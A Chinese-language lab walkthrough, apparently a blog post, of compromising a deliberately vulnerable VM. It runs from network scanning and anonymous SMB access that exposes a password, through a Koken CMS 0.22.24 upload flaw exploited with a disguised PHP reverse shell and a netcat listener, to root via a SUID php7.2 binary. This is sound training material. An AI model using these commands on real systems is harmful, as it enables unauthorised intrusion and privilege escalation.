废话不多说。下载安装先。
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-15-1024x515.png)
启动kali虚拟机
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-16-1024x581.png)
继续arp-scan -l查询目标ip
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-17.png)
目标:192.168.163.130,使用浏览器访问验证
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-18-1024x564.png)
是目标地址
使用nmap -sS -A 192.168.163.130查询相关的端口信息
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-20.png)
开放端口:80,139,445,8000
刚刚80端口这边我们已经访问过了,是纯静态的内容,逐一访问,发现8000端口存在一个CMS系统
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-21-1024x385.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-22.png)
是一个koken的cms,查询源码发现是0.22.24版本
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-23-1024x218.png)
使用nikto扫描工具扫描目录
nikto -h http://192.168.163.130:8000/
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-24-1024x452.png)
可能存在admin目录,我们访问一下试试看
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-25-1024x620.png)
页面设计的还不错。。。
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-26.png)
登录需要邮箱。我们目前没有,查阅exp库发现koken版本0.22.24的上传漏洞
不过我没法登录,咋上传啊,首页也没有上传点呐
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-27-1024x564.png)
于是乎,这个漏洞只能后期用
刚刚我们发现存在445 139端口,具有smb的特征,那么,文件系统是否有值得我们搜索的东西呢
使用enum4linux探索445端口 enum4linux 192.168.163.130
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-28.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-29.png)
没有账号密码,我们使用空密码连接挂载到我们本地目录下去
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-30.png)
看到有两个文件,第一个似乎是什么邮件的文件,我们cat一下
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-31.png)
那是密码吗?是邮箱号码?
agi@photographer.com 或者daisa@photographer.com 密码: babygirl
都试试看
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-32.png)
登录成功
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-33-1024x502.png)
这样一来,刚刚的上传漏洞就能搞他了
使用Kali自带的php反弹脚本来进行利用
cp /usr/share/webshells/php/php-reverse-shell.php ~/yyssdd.php.jpg
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-34.png)
改一下监听端口七七八八。
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-35.png)
接下来上传,使用burp修改后缀名
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-36-1024x501.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-37-1024x800.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-39-1024x508.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-38.png)
访问我们刚刚上传的
另外在kali这边设置好监听
nc -lvnp 1234
监听好后开始访问,获取到反弹shell
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-40.png)
接下来
python3 -c 'import pty;pty.spawn("/bin/bash")'
获取到交互式shell
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-41.png)
接下来查询关键的具有suid访问权限的程序
find / -perm -u=s -type f 2>/dev/null
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-42.png)
发现有一个php7.2的东东具有权限,我们利用php7.2获取到root权限
/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
使用php7.2的exec调起sh执行
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-43.png)
获取到root最高权
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/08/图片-44.png)
似乎是旗子,搞定
评论 (0)